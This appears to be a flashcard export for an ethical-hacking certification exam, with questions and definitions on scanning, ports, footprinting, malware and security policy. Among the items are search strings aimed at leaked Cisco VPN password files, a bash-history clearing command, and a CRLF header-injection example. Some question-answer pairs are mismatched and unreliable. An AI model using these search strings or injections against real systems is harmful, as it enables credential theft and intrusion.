Sally is a member of a pen test team newly hired to test a bank's security. She begins searching for IP addresses the bank may own by searching public records on the Internet. She also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is Sally working? A. Preparation B. Assessment C. Conclusion D. Reconnaissance

C) Hybrid attacks use a word list, substituting numbers and symbols in common places

Which of the following best describes a hybrid attack? A) Hybrid attacks make use of rainbow tables and a word list B) Hybrid attacks make use of two or more password cracking tools C) Hybrid attacks use a word list, substituting numbers and symbols in common places D) Hybrid attacks use two or more unedited word lists

B)Vulnerability

Which of the following best describes a weakness or error that can lead to a security compromise? A)Threat B)Vulnerability C)Threat agent D)Threat vector

Code designed to be run on the server

Which of the following best describes a web application?

B. BIA (Business Impact Analysis)

Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization? A. BCP B. BIA C. MTD D. DRP

A. It has few heavy security restrictions.

Which of the following best describes an intranet zone? A. It has few heavy security restrictions. B. A highly secured zone, usually employing VLANs and encrypted communication channels. C. A controlled buffer network between public and private. D. A very restricted zone with no users.

D) Intercepting traffic (MITM)

Which of the following best describes the purpose of the tool hunt? A) Footprinting B) Web application attack tool C) Vulnerability scanner D) Intercepting traffic (MITM)

A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources

Which of the following is a passive footprinting method? (Choose all that apply.) A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources C. Performing a ping sweep against the network range D. Sniffing network traffic through a network tap

A)Self-signed certificates

You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner? A)Self-signed certificates B)Online certificates C)Signed certificates D)X.509 certificates

C)Ecora Auditor Professional

You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements? A)Tenable Nessus Professional B)Active Network Security (Hping) C)Ecora Auditor Professional D)Network Mapper (Nmap)

C)Vulnerability assessment

You need to perform the following tasks: -Identify all resources on a target system. -Identify the potential threats to each resource on the system. -Determine a mitigation strategy to handle serious and likely threats. What is the name of this process? A)Social engineering B)System scanning C)Vulnerability assessment D)Penetration test

A. tcpdump -i eth0 -w my.log

You need to put the NIC into listening mode on your Linux box, capture packets, and write the results to a log file name my.log. How do you accomplish this with tcpdump? A. tcpdump -i eth0 -w my.log B. tcpdump -l eth0 -c my.log C. tcpdump /i eth0 /w my.log D. tcpdump /l eth0 /c my.log

D)Enable WPA on the WAP

You need to secure a wireless local area network (WLAN) without significantly reducing throughput or limiting the supported devices. Which implementation should provide the highest level of security? A)Create a VPN using OpenVPN B)Create a VPN using PPTP C)Enable WEP on the WAP D)Enable WPA on the WAP

C)PGP

You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using? A)3DES B)SHA-1 C)PGP D)RC4

D) 222.173.190.239

You receive a suspicious email and note the URL is pointing to 0xDE.0xBE.0xEF. If you enter the command ping 0xDE.0xAD.0BE.0xEF which IP address will resolve? A) 233.44.245.15 B) 222.87.57.238 C) 199.233.87.45 D) 222.173.190.239

Active banner grabbing Passive banner grabbing

______ involves sending specially crafted packets to remote systems and comparing responses to determine the OS. _____ involves reading error messages, sniffing network traffic, or looking at page extensions.

tiger team

a group of people, gathered together by a business entity, working to address a specific problem or goal.

Health Insurance Portability and Accountability Act (HIPAA)

addresses privacy standards with regard to medical information.

ARP Table

is a list of IP addresses and corresponding MAC addresses stored on a local computer

NetworkView

is a network discovery and management tool for Windows

Email tracking

is used to monitor the delivery of emails to an intended recipient

Scanning an entire subnet

nmap 192.168.1.0/24

Scan a single IP

nmap 192.168.1.100

GFI LanGuard

offers quality vulnerability and compliance scanning, as well as built-in patch management.

Well-known ports

port numbers 0 - 1023

XMAS scan

-sX

sniff traffic

A remote Trojan would be used to do all of the following except ___.

D. Open ports do not respond at all.

A team member runs an Inverse TCP scan. What is the expected return for an open port? A. Open ports respond with a SYN/ACK. B. Open ports respond with a RST. C. Open ports respond with a FIN. D. Open ports do not respond at all.

Script Kiddies

An unskilled hacker who compromises system by running scripts, tools, and software developed by real hackers

A network ID

192.168.5.1/24 an example of which kind of reserved IP address?

A broadcast address

192.168.6.255/24 an example of which kind of reserved IP address?

IPv6 loopback address

::1

collision domain

A domain composed of all the systems sharing any given physical transport media. Systems may collide with each other during the transmission of data.

B. LOCAL_System

A hacker successfully completes a buffer overflow attack on a default IIS installation running on an older Windows 2000 machine spawning a command shell, what privileges is the attack most likely now running with? A. Local administrator B. LOCAL_System C. IUSR_SYSTEMNAME D. Guest

buffer

A portion of memory used to temporarily store output or input data.

Computer Emergency Response Team (CERT)

Name given to expert groups that handle computer security incidents.

the design of the modern processor chips

Spectre and Meltdown are vulnerabilities found in ___ from AMD, ARM, and Intel

ACK (Acknowledgement)

TCP Flag, Acknowledges the receipt of a packet

URG (Urgent)

TCP Flag, Data contained in the packet should be processed immediately

RST (Reset)

TCP Flag, Resets a connection

PSH (Push)

TCP Flag, Sends all buffered data immediately

FIN (Finish)

TCP Flag, There will be no more transmissions

Telnet

This technique probes HTTP servers to determine the Server field in the HTTP response header

80. but on development servers ports 81 and 8080 are also used.

Which port number is commonly used for HTTP?

D. 514

Which port number is used by default for syslog? A. 21 B. 23 C. 69 D. 514

53

Which port number is used for DNS?

21

Which port number is used for FTP?

792

Which port number is used for ICMP?

137 138 139

Which port numbers are used for SMB?

161 and 162

Which port numbers are used for SNMP?

A. Full-connect

Which port-scanning method presents the most risk of discovery but provides the most reliable results? A. Full-connect B. Half-open C. Null scan D. XMAS scan

161 and 162

Which ports does SNMP use to function?

A)Gaining permission from concerned authorities

Which preliminary activity differentiates a penetration test performed by a white hat hacker and a gray hat hacker? A)Gaining permission from concerned authorities B)Gaining covert authorization from the government C)Gathering information without direct interaction with targets D)Gathering information from targets by any possible means

ipfwadm

Which program controls the packet filtering or firewall capabilities in Linux kernel versions 1.2.x and 2.0.x?

iptables

Which program replaced ipchains in Linux 2.4x?

ipchains

Which program replaced ipfwadm in Linux 2.2x?

Address Resolution Protocol (ARP)

Which protocol maps IP addresses to MAC addresses?

D) SMB

Which protocol usually listens on ports in the 137 to 139 range? A) Telnet B) Kerberos C) SNMP D) SMB

database

An organized collection of data.

web-based script

A Web shell is a ___ that allows access to a web server

history -c history -w

BASH Clearing the history

CNAME

Canonical naming allows aliases to a host

Contact e-mail

E-mail address of the person responsible for the zone file.

[location:]

Find information for a specific location

PTR

Map IP address to a hostname

UDP 137

NetBIOS Name Service (NBNS)

Promiscuous Policy

No restriction on usage of system resources

Proxy Browser for Android ProxyDroid NetShade

Proxy Tools for Mobile

ICMP Type 11 Code 0

The packet took to long to be routed to the destination the TTL expired

Auditing

The process of recording activity on a system for monitoring and later review.

TXT

Unstructured text records

Validate an email address

VRFY is used to do which of the following?

Layer 5 Session

X.225, SCP, ZIP, Etc. resides at what layer of the OSI model?

B) ICMP D) Nothing

A UDP scan can produce which two possible responses? (Choose Two) A) RST B) ICMP C) ACK D) Nothing

figure out the vulnerabilities the system posses carry out additional attacks

(Banner Grabbing) Identifying the OS used on the target host allows an attacker to ____ and the exploits that might work on a system to further ____.

Exploit

A breach of IT system security through vulnerabilities

UDP Port Closed

-If a UDP packet is sent to closed port, the system responds with ICMP port unreachable message -Spywares, Trojan horses, and other malicious applications use UDP ports

ICMP ping

-PI

No ping

-Po

Serial, slowest scan

-T0 -T1

UDP Port Open

-There is no three-way TCP handshake for UDP scan -The system does not respond with a message when the port is open

ACK scan

-sA

FIN scan

-sF

IDLE scan

-sI

SYN scan

-sS

TCP connect scan

-sT

asynchronous

1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.

RAT

A Trojan can include which of the following? A) RAT B) TCP C) Nmap D) Loki

Social engineering

A Trojan relies on ___ to be activated.

An SDK

A covert channel or backdoor may be detected using all of the following except ___. A) Nmap B) Sniffers C) An SDK D) Netcat

bit flipping

A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted

Two (Trigger and Payload)

A logic bomb has how many parts, typically?

Insert themselves into an active session

A man-in-the-middle attack is an attack where the attacking party does which of the following?

A. nmap -A IPAddress

A member of your team enters the following command: nmap -sV -sC -O -traceroute IPAddress Which of the following nmap commands performs the same task? A. nmap -A IPAddress B. nmap -all IPAddress C. nmap -Os IPAddress D. nmap -sA IPAddress

Unicast

A packet addressed for, and intended to be received by, only one host interface

Anycast

A packet addressed in such a way that any of a large group of hosts can receive it, with the nearest host (in terms of routing distance) opening it

Multicast

A packet that is addressed in such a way that multiple host interfaces can receive it

D. Passive

A pen test member has gained access to an open switch port. He configures his NIC for promiscuous mode and sets up a sniffer, plugging his laptop directly into the switch port. He watches traffic as it arrives at the system, looking for specific information to possibly use later. What type of sniffing is being practiced? A. Active B. Promiscuous C. Blind D. Passive E. Session

A. To possibly gather information about internal hosts used in the organization's e-mail system

A pen test team member sends an e-mail to an address that she knows is not valid inside an organization. Which of the following is the best explanation for why she took this action? A. To possibly gather information about internal hosts used in the organization's e-mail system B. To start a denial-of-service attack C. To determine an e-mail administrator's contact information D. To gather information about how e-mail systems deal with invalidly addressed messages

ICMP Type 8

A ping message, requesting an Echo reply.

Baseline

A point of reference used to mark an initial state in order to manage change.

Evades detection through rewriting itself

A polymorphic virus ____

copyright

A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.

business continuity plan (BCP)

A set of plans and procedures to follow in the event of a failure or a disaster--security related or not--to get business services back up and running.

certificate authority (CA)

A trusted entity that issues and revokes public key certificates. In a network, is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.

This flag is set as an acknowledgment to SYN flag. This flag is set on all segments after the initial SYN flag.

ACK (Acknowledgment)

countermeasures

Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.

assessment

Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Push and pop

Adding to and removing from a program stack are known as what?

Africa

AfriNIC manages what areas?

D) A nmap scan with the -sO switch

After a network scan, very few conventional ports are discovered to be open. You decide you want to discover as many protocols on the sweep as possible. Which of the following is the best choice for your port scan? A) A nessus sweep of the subnet B) A nmap scan with the -sP switch C) A nmap scan with the -se switch D) A nmap scan with the -sO switch

Common Internet File System/Server Message Block

An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.

Local configuration of an internal router by an internal administrative workstation

An administrator is configuring a network intrusion detection system (IDS). Audit rules need to be configured so that only malicious activities and policy violations are detected and logged. Which of these scenarios should you NOT add as an audit rule? A)Local configuration of an internal router by an internal administrative workstation B)Remote access of an external router from a known IP address in a blacklist database C)Remote configuration of an internal router by an unknown external laptop D)Local access of an internal router from an unknown IP address not in an employee database

An obvious method to use a system

An overt channel is ___?

Single loss Expectancy (SLE) x Annual Rate of Occurrence (ARO)

Annualized Loss Expectancy (ALE) = what?

are services on the Internet that make use of a web proxy to hide your identity.

Anonymizers

ICMP Type 0

Answer to a Type 8 Echo Request.

alter the launch daemon's

Attacker can ___ executable to maintain persistence or to escalate privileges

web-stat Alexa Monitis

Attacker uses website traffic monitoring tools such as ______, etc. to collect the information about target company.

installs reverse HTTP shell

Attackers ___ on victim's machine, which is programmed in such a way that it would ask for commands to an external master who controls the reverse HTTP shell

exploit software vulnerabilities

Attackers ____ by taking advantage of programming flaws in a program, service, or within the operating system software or kernel to execute malicious code

execute malicious code

Attackers alter plist files to ___ on behalf of a legitimate user to escalate privileges

Audit data

Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.

filetype:pcf"cisco" "GroupPwd"

Cisco VPN files with Group Passwords for remote access

CSMA/CD (collision detection) CSMA/CA (collision avoidance)

Collisions within a collision domain can be managed by ___ or ___.

clear text

Community strings are transmitted in ____ in SNMPv1

CAM table

Content addressable memory table. Holds all the MAC-address-to-port mappings on a switch.

"Config" intitle:"Index of" intext:vpn

Directory with keys of VPN servers

info:string example: info:www.anycomp.com

Displays information Google stores about the page itself

link:string

Displays linked pages based on a search term.

[cache:]

Displays the web pages stored in the Google cache

1. Check for live systems 2. Check for open ports 3. Scan beyond IDS 4. Perform banner grabbing 5. Scan for vulnerabilities 6. Draw network diagrams 7. Prepare proxies

EC-Council's scanning methodology phases include the following steps:

C. Hashing

Elements of security include confidentiality, integrity, and availability. Which technique provides for integrity? A. Encryption B. UPS C. Hashing D. Passwords

eMailTrackerPro PoliteMail Yesware ContactMonkey Zendio ReadNotify DidTheyReadIt Trace Email

Email Tracking Tools

track an email and extract information

Email tracking tools allow an attacker to ____ such as sender identity, mail server, sender's IP address, location, etc.

A. FISMA

Enacted in 2002, this U.S. law requires every Federal agency to implement information security programs, including significant reporting on compliance and accreditation. Which of the following is the best choice for this definition? A. FISMA B. HIPAA C. NIST 800-53 D. OSSTM

Engineer's Toolset SNMPScanner OpUtils 5 SNScan

Enumerate with SNMP tools:

identify any vulnerable services

Enumerating RPC endpoints enable attackers to ___ on these service ports

PsTools

Enumerating user accounts using ___ suite helps to control and manage remote systems from the command line

ICMP Type 3 Code 13

Error message - Communication administratively prohibited

ICMP Type 3 Code 1

Error message - Destination host unreachable

ICMP Type 3 Code 0

Error message - Destination network unreachable

Vulnerability

Existence of a weakness, design, or implementation error that can lead to an unexpected event compromising the security of the system

"." Root .gov, .com, .net, .org Top Level-"Parent Domain" microsoft.com, google.com Second Level-"Child Domain" www.anyname.com Third Level-Hosts and Rsources

Explain DNS structure.

Domain Dossier DNS Lookup

Extracting DNS Information

Folder Steganography

Files are hidden and encrypted within a folder and do not appear to normal Windows applicaiton, including Windows Explorer

Netcraft

Find restricted URLs or operating systems (OS) can be found using what? also has a toolbar add-on for Firefox and Chrome

ARIN whois database search

Find the range of IP addresses using ______

"[main]" "enc_GroupPwd=" ext:txt

Finds Cisco VPN client passwords (encrypted, but easily cracked)

Inurl:/remote/login?lang=en

Finds ForiGate Firewall's SSL-VPN login portal

GiliSoft File Lock Pro Folder Lock Hide Folders 5 WinMend Folder Hidden Invisible Secrets 4 Max Folder

Folder Steganography Tools

Google Yahoo! Search Ask Bing Dogpile

Footprint search engines such as ___ , etc. to gather target organization's information such as employee details, login pages, intranet portals, etc. that helps in performing social engineering and other types of advanced system attacks

reduces the attacker's focus area

Footprinting ___ to a specific range of IP addresses, networks, domain names, remote access, etc.

draw a map or outline

Footprinting allows attackers to ____ the target organization's network infrastructure to know about the actual environment that they are going to break

Hoovers LexisNexis Business Wire

Gather competitive intelligence using tools such as ___ , etc.

public network information system information personal information

Groups, forums, and blogs provide sensitive information about a target such as ______

Algorithms

Hide data in mathematical functions used in compression algorithms

C) He cannot spoof his IP and successfully use TCP

Hijacking BlackBerry communications is referred to as "Blackjacking". Which of the following tools is used in this effort? A) The firewall is blocking telnet traffic B) Port 23 is not the correct port for telnet C) He cannot spoof his IP and successfully use TCP D) The target is most likely a honeypot

Malware attacks Footprinting Password attacks Denial-of-Service attacks Arbitrary code execution Unauthorized access Privilege escalation Backdoor attacks Physical security threats

Host Threats

By ping scanning very slowly

How can a hacker take advantage of alert threshold settings to avoid detection?

more ~/.bash_history

How can you view the BASH saved command history?

Scan entire subnet for live host

Hping Commands: hping3 -1 10.0.1.x --rand-dest -I eth0

UDP scan on port 80

Hping Commands: hping3 -2 10.0.0.25 -p 80

IDLE Scan: Step 3

IPID Probe SYN+ACK Packet --> (zombie) <-- Response: IPID=31339 RST Packet IPID incremented by 2 since step 1, so port 80 must be open

IDLE Scan: Step 1

IPID Prove SYN+ACK Packet --> (zombie) <-- Response: IPID=31337 RST Packet

TTL Expired

If a packet capture device show the packet as Type 11, Code 0 what does it mean?

Administratively Blocked

If a packet capture device show the packet as Type 3, Code 13 what does it mean?

nbtstat -A IPADDRESS

If you want to bring up a remote system table using NetBIOS.

eavesdropping shoulder surfing dumpster divingf

Implement social engineering techniques such a ____ that may help to gather more critical information about the target organization

setuid setgid

In Linux and MacOS, if an application uses ___ or ___ then the application will execute with the privileges of the owning user or group

FIN URG PSH

In Xmas scan, attackers send a TCP frame to a remote device with ___ flags set

asymmetric algorithm

In computer security, an algorithm that uses separate keys for encryption and decryption.

active passive

In enumeration, ___ OS fingerprinting involves sending crafted, nonstandard packets to a remote host and analyzing the replies. ____ OS fingerprinting involves sniffing packets without injecting any packets into the network--examining things like Time-to-Live (TTL), window sizes, Don't Fragment (DF) flags, and Type of Service (ToS) fields from the capture.

access control lists

In networking, ____ are commonly associated with firewall and router traffic-filtering rules.

collision

In regard to hash algorithms, occurs when two or more distinct inputs produce the same output.

attacker

In source routing, the ___ makes some or all of these decisions on the router

Port number

In the command telnet 192.168.5.5 23, what does the number 23 stand for?

Where messages are routed through multiple intermediaries

In what scenarios should end-to-end security mechanisms like XMLEncryption, XMLSignature, and SAML assertions be used?

Spear phishing

In what type of attack does the attacker send high-level personnel an email that appears to come from an individual who might reasonably request confidential information, but the email includes a bogus link?

Social engineering

In what type of attack does the attacker use believable language to attempt to gain confidential information, especially login credentials, from personnel?

Penetration testing

In which CEH hacking stage do try to break the security of the system?

Scanning/Enumeration

In which phase of an attack does discovery of live hosts, access points, accounts and policies, and vulnerability assessment occur?

Reconnaissance

In which phase of an attack does information gathering, physical and social engineering, and locating network ranges occur?

Clearing Tracks

In which phase of an attack is the record of the attack wiped or obscured?

D. Maintaining access

In which phase of the attack would a hacker set up and configure "zombie" machines? A. Reconnaissance B. Covering tracks C. Gaining access D. Maintaining access

SDA

Indicate authority for domain

Cyber Terrorists

Individuals with wide range of skills, motivated by religious or political beliefs to create fear by large-scale disruption of computer networks

Gather personal information that assists to perform social engineering

Information obtained from WHOIS database assists an attacker to:

active fingerprinting

Injecting traffic into the network to identify the operating system of a device

Footprinting

Is the process of collecting as much information as possible about a target network, for identifying various ways to intrude into an organization's network system

Hack Value

It is the notion among hackers that something is worth doing or is interesting

NetScanToolsPro

It lists IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automaticially or manually (using manual tools)

Open Source Security Testing Methodology Manual (OSSTM)

It's a peer-reviewed formalized methodology of security testing and analysis that can "provide actionable information to measurably improve your operational security."

www.archive.org Google Cache

Keeps snapshots of sites from days gone by:

Amac Keylogger Elite Keylogger Auto Mac OS X KeyLogger KidLogger for MAC Perfect Keylogger for Mac MAC Log Manager

Keyloggers for Mac

All In One Keylogger Spyrix Personal Monitor SoftActivity Activity Monitor Elite Keylogger Keylogger Spy Monitor Micro Keylogger

Keyloggers for WindowsQ

Latin America and the Caribbean.

LACNIC manages what areas?

Query a database

LDAP is used to perform which function?

port 389

LDAP sessions are started by a client on TCP ____ connecting to a Directory System Agent (DSA).

Physical

Layer 1 of OSI model

Data Link

Layer 2 of OSI model

Data Link layer

Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. Is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. Is composed of two sublayers: the MAC and the LLC.

Network

Layer 3 of OSI model

Transport

Layer 4 of OSI model

Security (Restrictions), Functionality (Features), Usability (GUI)

Level of security in any system can be defined by the strength of three components of this triangle.

[related:]

Lists web pages that are similar to a specified web page

[link:]

Lists web pages that have links to the specified web page

asymmetric

Literally, "not balanced or the same." In computing, ___ refers to a difference in networking speeds upstream to downstream. In cryptography, it's the use of more than one key for encryption/authentication purposes.

D)Smart cards

Management at your organization has asked you to implement an access control mechanism that uses Extensible Authentication Protocol (EAP). Which mechanism should you implement? A)Biometrics B)Access control lists (ACLs) C)Complex passwords D)Smart cards

A)Active

Management has increasingly become concerned about sniffing attacks. Which type of sniffing involves launching an ARP spoofing or traffic-flooding attack? A)Active B)Passive C)Promiscuous D)Broadcast

Metagoofil ExtractMetadata FOCA Meta Tag Analyzer BuzzStream Analyze Metadata Exiftool

MetaData Extraction Tools

TCP/UDP 135

Microsoft RPC Endpoint Mapper

Internet Security Association and Key Management Protocol (ISAKMP)

Most IPsec based VPNs use ____ , a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment

80 25

Most network servers listen on TCP ports, such as web servers on port ___ and mail servers on port ___. Port is considered "open" if an application is listening on the port

Web Mirroring Tools

NCollector Studio Teleport Pro Portable Offline Browser Website Ripper Copier Gnu Wget HTTrack Web Site Copier

Alternate Data Streams

NTFS has a feature call as ___ that allows attackers to hide a file behind other normal files

TCP 139

NetBIOS Session Service (SMB over NetBIOS)

<1C> UNIQUE

NetBIOS code and type for Domain controller.

<1B> UNIQUE

NetBIOS code and type for Domain master browser.

<00> GROUP

NetBIOS code and type for Domain name

<00> UNIQUE

NetBIOS code and type for Hostname

Net Master Scany Network "Swiss-Army-Knife"

Network Discovery Tools for Mobile

Network Topology Mapper OpManager NetworkView The Dude Switch Center Enterprise LANState InterMapper Friendly Pinger NetMapper Ipsonar NetBrain Enterprise Suite WhatsConnected Spiceworks-Network Mapper

Network Discovery and Mapping Tools

Nmap

Network administrators can use __ for network inventory, managing service upgrade schedules, and monitoring host or service uptime

number of packets sent

OS increments the IPID for each packet sent, thus probing an IPID gives an attacker the ___ since last probe.

legislative (government regulations) contractual (industry or group requirements) standards based (practices that must be followed in order to remain a member of a group or organization)

OSSTM defines three types of compliance for testing: ___, ___, ___.

Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map

Objectives of Footprinting

A)SNScan

One of your company's IT technicians provides you with a report that that lists SNMP-enabled devices on a network. Which tool most likely provided this information? A)SNScan B)Foundstone C)Ecora D)NetBus

Anonymizers for Mobile

Orbot Psiphon OpenDoor

DNSstuff DNS Records

Perform DNS footprinting using tools such as ___, etc. to determine key hosts in the network and perform social engineering attacks

GHDB MeaGoofil SiteDigger

Perform Google hacking using tools such as ___ etc.

first layer of protection

Physical security is the ______ in any organization

console port

Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.

Combining pings to every address within a range

Ping sweep or ICMP Echo scanning

RPC (TCP)

Port number 135

NetBIOS (TCP, UDP)

Port number 137 - 139

IMAP (TCP)

Port number 143

SNMP (UDP)

Port number 161/162

BGP

Port number 179

FTP (TCP)

Port number 20, 21

[info:]

Presents some information that Google has about a particular web page

Stateful Firewall is Present (ACK Flag Probe)

Probe Packet (ACK) --> <-- No Response

No Firewall (ACK Flag Probe)

Probe Packet (ACK) --> <-- RST

Port is closed (Inverse TCP Flag Scanning)

Probe Packet (FIN/URG/PSH/NULL) --> <-- RST/ACK

User

RID -1000 and up

Administrator

RID -500

Guest

RID -501

Europe, Middle East, and parts of Central Asia/Northern Africa.

RIPE manages what areas?

This flag forces a termination of communications (in both directions)

RST (Reset)

Prevent hackers Uncover vulnerabilities Strengthen an organization's security posture

Reasons why organizations recruit ethical hackers

C)Databases

Recently you discovered that several of your company's computers have experienced SQL injection attacks. Which specific entity is attacked? A)Routers B)Firewall C)Databases D)Web servers

ICMP Type 5 Code 1

Redirect datagram for the host

ICMP Type 5 Code 0

Redirect datagram for the network

Website footprinting

Refers to monitoring and analyzing the target organizations website for information

Clearing Tracks or Covering Tracks

Refers to the activities carried out by an attacker to hide malicious acts

Authenticity

Refers to the characteristics of a communication, document or any data that ensures the quality of being genuine

Maintaining Access

Refers to the phase when the attacker tries to retain his or her ownership of the system

Gaining Access

Refers to the point where the attacker obtains access to the operating system or application on the computer or network

Scanning

Refers to the pre-attack phase when the attacker scans the network for specific information on the basis of information gathered during reconnaissance

Reconnaissance

Refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching an attack

ARIN AFRINIC RIPE LAC APNIC

Regional Internet Registries (RIRs)

remotely installs applications, executes programs/scripts

RemoteExec ___, and updates files and folders on Windows system throughout the network

RP

Responsible person

[intitle:]

Restricts the results to documents containing the search keyword in the title

[site:]

Restricts the results to those websites in the given domain

[allinurl:]

Restricts the results to those with all of the search keywords in the URL

UDP/TCP ports 2000, 2001, 5050, 5061

SIP service generally uses what ports?

TCP/UDP 445

SMB over TCP (Direct Host)

RCPT TO

SMTP (Simple Mail Transfer Protocol) command to define recipients.

EXPN

SMTP (Simple Mail Transfer Protocol) command to provide the actual delivery addresses of mailing lists and aliases.

VRFY

SMTP (Simple Mail Transfer Protocol) command to validate users.

Send email messages

SMTP is used to perform which function?

Three-way handshake

SYN SYN/ACK ACK

IDLE Scan: Step 2 (Port Closed)

SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- RST

intitle:string example: intitle: login example: allintitle:login password

Searches for pages that contain the string in the title.

filetype: example: filetype:doc

Searches only for files of a specific type (DOC, XLS, and so on).

IPsec

Session hijacking can be performed on all of the following protocols except which one? FTP SMTP HTTP IPsec

Authentication

Session hijacking can be thwarted with which of the following? SSH FTP Authentication Sniffing

RedirectEXE injectDLL GetProcAddress

Shims like ___ can be used by attackers to escalate privileges, install backdoors, disable Windows defender, etc.

related:webpagename

Shows web pages similar to webpagename.

TCP 25

Simple Mail Transfer Protocol (SMTP)

UDP 161

Simple Network Management Protocol (SNMP)

gives attackers full access to your system

Sirefef Rootkit or ZeroAccess ___ while using stealth techniques in order to hide its presence from the affected device

altering the internal processes

Sirefef hides itself by ___ on an operating system so that your anitvirus and anti-spyware can't detect it

Phishing

Social engineering can be used to carry out email campaigns known as _____?

Human nature Technology People Physical

Social engineering preys on many weaknesses including _____

SEC Info (www.secinfo.com) Experian (www.experian.com) Market Watch (www.marketwatch.com) Wall Street Monitor (www.twst.com) Euromonitor (www.euromonitor.com)

Some websites for competitive intelligence. Company plans and financials.

EDGAR Databse (www.sec.gov/edgar.shtml) Hoovers (www.hoovers.com) LexisNexis (www.lexisnexis.com) Business Wire (www.businesswire.com)

Some websites for competitive intelligence. Information on company origins and how it developed over the years can be found in places like:

Authenticity

Sometimes included as a security element, refers to the characteristic of data that ensures it is genuine.

establishes a full connection

TCP Connect scan ___ and tears it down by sending a RST packet

super user privileges

TCP Connect scan does not require ___

SYN (Synchronize)

TCP Flag, Initiates a connection between hosts

Layer 4 Transport

TCP, UDP resides at what layer of the OSI model?

Anonymizers

Tails G-Zapper Proxify Guardster Psiphon Spotflux Anonymous Web Surfing Tool Ultrasurf Hide Your IP Address Head Proxy Anonymizer Universal Hope Proxy

live operating system

Tails is a _____, that user can start on any computer from a DVD, USB stick, or SD card.

public

The ___ community string is used for read-only searches.

NTLMv2 hash

The attacker cracks the ____ obtained from the victim's authentication process

Tcpdump

The command-line equivalent of Win Dump is known as what?

Authorization

The conveying of official access or legal power to a person or entity.

Security target (ST)

The documentation describing the TOE (Target of evaluation) and security requirements

organizational unique identifier (OUI)

The first half of the MAC address, consisting of 3 bytes (24 bits), is known as the ____ and is used to identify the card manufacturer.

Gray hats

The hardest group to categorize, these hackers are neither good nor bad.

Internet and other publicly accessible sources

The pen tester attempts to gather as much information as possible about the target organization from the _____

Authentication

The process of determining whether a network entity (user or service) is legitimate--usually accomplished through a user ID and password.

cryptography

The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.

Asynchronous transmission

The transmission of digital signals without precise clocking or synchronization

Password Policy

This defines everything imaginable about passwords within the organization, including length, complexity, maximum and minimum age, and reuse.

Information Protection Policy

This defines information sensitivity levels and who has access to those levels. It also addresses how data is stored, transmitted, and destroyed.

Access Control Policy

This identifies the resources that need protection and the rules in place to control access to those resources

ICMP Echo Scanning

This is not really port scanning, since ICMP does not have a port abstraction. But it is sometimes useful to determine which hosts in a network are up by pinging them all

PTR (Pointer)

This maps an IP address to a hostname (providing for reverse DNS lookups).

Special-Access Policy

This policy defines the terms and conditions of granting special access to system resources

SRV (Service)

This record defines the hostname and port number of servers providing specific services, such as a Directory Services server.

IDLE

This uses a spoofed IP address (zombie system) to elicit port responses during a scan.

risk assessment approach

Threat modeling is a ____ for analyzing security of an application by capturing, organizing, and analyzing all the information that affects the security of an application

A)CRLF injection

Through a company website, customers use a standard HTML form to submit service requests to the web server. The web server in turn creates an SMTP email and sends it on to a customer support email address. The HTML form receives the following subject line: Email is not working&lt;CR&gt;&lt;LF&gt;Bcc: [email protected] Which type of attack is being attempted? A)CRLF injection B)Session splicing C)XSS D)Email spoofing

A)Throttling

To prevent DoS attacks, you set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for a server to process. What is this process referred to? A)Throttling B)Filtering C)QoS D)Clustering

Phishing Tailgating/Piggybacking

Training and education of end users can be used to prevent _____

When this flag is set, it indicates the data inside is being sent out of band. Cancelling a message mid-stream is one example.

URG (Urgent)

Layer 1 Physical

USB Standards, Bluetooth, Etc. resides at what layer of the OSI model?

bluesnarfing

Unauthorized access to information such as a calendar, contact list, e-mails, and text messages on a wireless device through a Bluetooth connection.

determine the OS

Use the Netcraft tool to _____ in use by the target organization.

Netcraft tool

Use the ___ to determine the Operating Systems in use by the target organization

HTTP GET commands

Victim here will act as a web client who is executing ___ whereas the attacker behaves like a web server and responds to the requests (Covering Tracks on Network Using Reverse HTTP Shells)

Denial-of-Service (DoS) Session Hijacking Caller ID spoofing Eavesdropping Spamming over Internet Telephoney (SPIT) VoIP phishing (Vishing)

VoIP enumeration information can be used to launch various VoIP attacks such as ____

SIP (Session Initiation Protocol)

VoIP uses ___ protocol to enable voice and video calls over an IP network

National Vulnerability Database (nvd.nist.gov) Securitytracker (www.securitytracker.com) Hackerstorm Vulnerability Database Tool (www.hackerstorm.com) Security-Focus (www.securityfocus.com)

